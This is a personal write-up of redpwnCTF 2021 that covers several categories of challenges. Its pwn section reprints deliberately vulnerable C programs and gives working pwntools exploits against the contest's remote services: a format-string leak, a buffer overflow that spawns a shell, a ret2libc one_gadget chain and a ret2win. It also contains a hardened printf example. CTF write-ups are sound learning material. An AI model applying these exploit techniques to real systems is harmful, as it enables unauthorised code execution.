redpwnCTF 2021 write-up


CRYPTO

baby

https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c

 


See the link above for reference.

 

scissor

scissor -> Caesar: just run it through a Caesar cipher.

The +12 shift then shows something that looks like the flag; wrap it as flag{surroud~~}.

 

MISC

compliant-lattice-feline

 

pwnable

printf_please

A format string challenge. Enter a lot of %p specifiers and convert the hex values that come back into ASCII.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
  char buffer[0x200];
  char flag[0x200];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  memset(buffer, 0, sizeof(buffer));
  memset(flag, 0, sizeof(flag));

  int fd = open("flag.txt", O_RDONLY);
  if (fd == -1) {
    puts("failed to read flag. please contact an admin if this is remote");
    exit(1);
  }

  read(fd, flag, sizeof(flag));
  close(fd);

  puts("what do you say?");

  read(0, buffer, sizeof(buffer) - 1);
  buffer[strcspn(buffer, "\n")] = 0;

  if (!strncmp(buffer, "please", 6)) {
    printf(buffer); // the format string bug (FSB) triggers here
    puts(" to you too!");
  }
}

'flag{pl3as3_pr1ntf_w1th_caut10n_9a3xl}'
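The hex-to-ASCII step and the fix for `printf(buffer)`, as an added example that is not the challenge's or the author's code. `SAMPLE_DUMP` is constructed from the flag shown above, assuming a little-endian 64-bit target; `decode_pointer_dump` and `echo_fixed` are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample: the words %p would print for the stack slots that
 * hold the flag shown above, on a little-endian 64-bit target. */
static const char SAMPLE_DUMP[] =
    "0x336c707b67616c66 0x6e3172705f337361 0x5f687431775f6674 "
    "0x5f6e303174756163 0x7d6c78336139";

/* Turn space-separated %p words back into the bytes they held in memory.
 * The least significant byte of each word comes first. Stops at the first
 * zero byte or unparsable token such as "(nil)". Returns bytes written. */
size_t decode_pointer_dump(const char *dump, char *out, size_t outsz)
{
    size_t n = 0;
    if (outsz == 0) return 0;
    for (const char *p = dump; *p; ) {
        char *end;
        uint64_t word = strtoull(p, &end, 16);   /* skips spaces, accepts 0x */
        if (end == p) break;
        for (int i = 0; i < 8; i++) {
            unsigned char b = (unsigned char)(word >> (8 * i));
            if (b == 0 || n + 1 >= outsz) { out[n] = '\0'; return n; }
            out[n++] = (char)b;
        }
        p = end;
    }
    out[n] = '\0';
    return n;
}

/* Hardened form of printf(buffer): input is an argument, never the format. */
int echo_fixed(const char *input, char *out, size_t outsz)
{
    return snprintf(out, outsz, "%s to you too!", input);
}

int main(void)
{
    char flag[64], line[64];
    decode_pointer_dump(SAMPLE_DUMP, flag, sizeof flag);
    echo_fixed("please %p %p", line, sizeof line);
    printf("%s (%zu bytes)\n%s\n", flag, strlen(flag), line);
    return 0;
}
```

With the constant format string, `%p` in the input is echoed literally instead of reading stack slots.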

 

Beginners-generic

There is a buffer overflow; all that is needed is to overwrite inspirational_message_index with -1.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>


const char *inspirational_messages[] = {
  "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"",
  "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"",
  "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"",
};

int main(void)
{
  srand(time(0));
  long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *));
  char heartfelt_message[32];
  
  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts(inspirational_messages[inspirational_message_index]);
  puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!");
  puts("can you write me a heartfelt message to cheer me up? :(");

  gets(heartfelt_message); //bof

  if(inspirational_message_index == -1) {
    system("/bin/sh");
  }
}

Exploit

from pwn import *

p = remote('mc.ax', 31199)
#p = process('./beginner-generic-pwn-number-0')

# 40 filler bytes, then -1 as a 64-bit value (bytes, so this also runs on Python 3)
p.sendlineafter(b':(', b"A"*40 + p64(0xffffffffffffffff))

p.interactive()

 

Ret2the-unknown

 

#include <stdio.h>
#include <string.h>

int main(void)
{
  char your_reassuring_and_comforting_we_will_arrive_safely_in_libc[32];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts("that board meeting was a *smashing* success! rob loved the challenge!");
  puts("in fact, he loved it so much he sponsored me a business trip to this place called 'libc'...");
  puts("where is this place? can you help me get there safely?");

  // please i cant afford the medical bills if we crash and segfault
  gets(your_reassuring_and_comforting_we_will_arrive_safely_in_libc);

  puts("phew, good to know. shoot! i forgot!");
  printf("rob said i'd need this to get there: %llx\n", printf);
  puts("good luck!");
}

 

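When run, the program prints the address of printf; leak that address and finish with a one_gadget.

The program exits right after printing the address, though, so first overwrite the return address with main_offset to make it run again. The chain is: printf leak -> libc base leak -> overwrite ret with the one_gadget to exploit.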

 

from pwn import *

#p = process('./ret2the-unknown')
p = remote('mc.ax', 31568)
e = ELF('./ret2the-unknown')
libc = ELF('./libc-2.28.so')

main_offset = e.sym.main
one_gadget = [0x4484f, 0x448a3, 0xe5456]
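# first pass: return into main so the program runs a second time
payload = b"A"*40
payload += p64(main_offset)

p.sendlineafter(b'safely?', payload)

# parse the printed printf address and derive the libc base from it
p.recvuntil(b'there: ')
leak_printf = int(p.recvline().strip(), 16)
leak_libc = leak_printf - libc.sym.printf
one_shot = leak_libc + one_gadget[0]

# second pass: return into the one_gadget
payload1 = b"A"*40
payload1 += p64(one_shot)
p.sendlineafter(b'safely?', payload1)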
p.interactive()

 

Ret2generic-flag

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void super_generic_flag_reading_function_please_ret_to_me()
{
  char flag[0x100] = {0};
  FILE *fp = fopen("./flag.txt", "r");
  if (!fp)
  {
    puts("no flag!! contact a member of rob inc");
    exit(-1);
  }
  fgets(flag, 0xff, fp);
  puts(flag);
  fclose(fp);
}

int main(void)
{
  char comments_and_concerns[32];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...");
  puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!");
  puts("slap on some flavortext and there's no way rob will fire me now!");
  puts("this is genius!! what do you think?");

  gets(comments_and_concerns); // bof + rtl
}

 

Simply overwrite the return address with the address of super_generic_flag_reading_function_please_ret_to_me and that's it.

from pwn import *

p = remote('mc.ax', 31077)

p.sendlineafter(b'think?', b"A"*40 + p64(0x4011f6))
p.interactive()

REV

wstrings

Looking at the rodata section in IDA shows the flag; entering it as-is solves the challenge.

WEB

Inspect-me

Open the developer tools with F12; the answer is in the page source.

 

ORM-BAD

 

An SQL injection challenge.

 

Make both the ID and the PW conditions evaluate to true and it's done.

 

 

 

 

 

Finished in 373rd place overall as a one-person team.

 

+ I feel that I need to study more...

 

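In pwn/simultaneity you are given a heap address, and allocating a chunk with a size of 214000 or more (or above some particular value) makes the allocation go through mmap, but

I didn't know how to solve it from there, so I couldn't solve it.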

 

I'll try it once more, and if that doesn't work I'll read a write-up..

 

 

Challenge binaries

https://github.com/redpwn/redpwnctf-2021-challenges

 
